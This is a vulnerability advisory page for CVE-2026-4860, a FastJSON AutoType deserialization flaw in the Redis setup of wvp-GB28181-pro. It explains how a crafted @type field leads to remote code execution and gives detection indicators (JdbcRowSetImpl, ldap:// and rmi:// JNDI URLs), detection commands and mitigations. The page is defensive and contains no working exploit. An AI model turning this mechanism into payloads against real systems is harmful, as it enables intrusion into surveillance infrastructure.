CVE-2026-4860
Remote Deserialization Vulnerability in wvp-GB28181-pro API Endpoint
Publication date: 2026-03-26
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| fastjson | fastjson | 2.0.57 |
| spring_project | spring_boot | * |
| redis | redis | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-20 | The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
| CWE-502 | The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid. |
Attack-Flow Graph
AI Powered Q&A
How can this vulnerability impact me? :
This vulnerability can lead to complete server compromise remotely without authentication if unauthenticated write endpoints exist, or with low privileges otherwise.
- Full confidentiality breach: attackers can read all data stored in Redis, including sensitive video streams, credentials, and configuration.
- Integrity compromise: attackers can modify application state, video streams, user permissions, and inject malicious data.
- Availability impact: attackers can crash the application, disrupt video streaming, delete data, or use the server as a pivot for lateral movement.
In video surveillance platforms, this can lead to manipulation of live video streams, disabling of cameras, and compromise of physical security infrastructure.
Can you explain this vulnerability to me?
CVE-2026-4860 is a critical remote code execution (RCE) vulnerability in the wvp-GB28181-pro web application version 2.7.4. It arises from unsafe Redis template configuration where the application uses FastJSON's GenericFastJsonRedisSerializer with AutoType enabled by default. This allows attackers to send malicious JSON payloads containing a crafted @type field that specifies arbitrary classes to be instantiated during deserialization.
When the application reads these malicious JSON payloads from Redis, FastJSON deserializes them and instantiates attacker-specified classes, which can execute malicious code remotely without authentication. This vulnerability affects the Redis serialization configuration and multiple service classes that read from Redis without validation.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious JSON payloads containing the `@type` field with unusual values such as `JdbcRowSetImpl` or JNDI URLs like `ldap://` and `rmi://` in Redis data or API requests.
Indicators include unexpected Redis key structures, anomalous JNDI/LDAP network connections, Java processes spawning child processes unexpectedly, and application crashes triggered by Redis reads.
Suggested detection commands and methods include:
- Use Redis CLI to scan for keys and inspect values for suspicious `@type` fields, e.g., `redis-cli KEYS '*'` and `redis-cli GET <key>`.
- Monitor network traffic for outbound LDAP, RMI, or DNS connections that could indicate JNDI lookups, e.g., using `tcpdump` or `Wireshark` filtering on ports 389 (LDAP), 1099 (RMI), and DNS ports.
- Check application logs for deserialization errors or unexpected behavior during Redis reads.
- Implement Sigma detection rules for suspicious JNDI connections targeting LDAP/RMI/DNS ports.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include disabling the AutoType feature or restricting it to a safe whitelist in the FastJSON serializer configuration used by the Redis template.
Additionally, validate and sanitize all JSON data before storing or deserializing it from Redis to prevent malicious payloads.
Other important steps are to update FastJSON to a secure version that does not have AutoType vulnerabilities and to harden API endpoints by requiring authentication and limiting write access.
Monitoring Redis logs and network traffic for suspicious activity should also be implemented as part of ongoing defense.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
CVE-2026-4860 enables remote code execution leading to full confidentiality, integrity, and availability compromise of the affected system. Attackers can read sensitive data stored in Redis, including credentials and video streams, modify application state and user permissions, and disrupt services.
Such a breach can result in unauthorized access to personal and sensitive information, violating data protection regulations like GDPR and HIPAA that mandate strict controls over data confidentiality and integrity.
The vulnerability's impact on data confidentiality and integrity, combined with the potential for service disruption, means organizations using the affected software may fail to meet compliance requirements related to data security, breach notification, and system availability.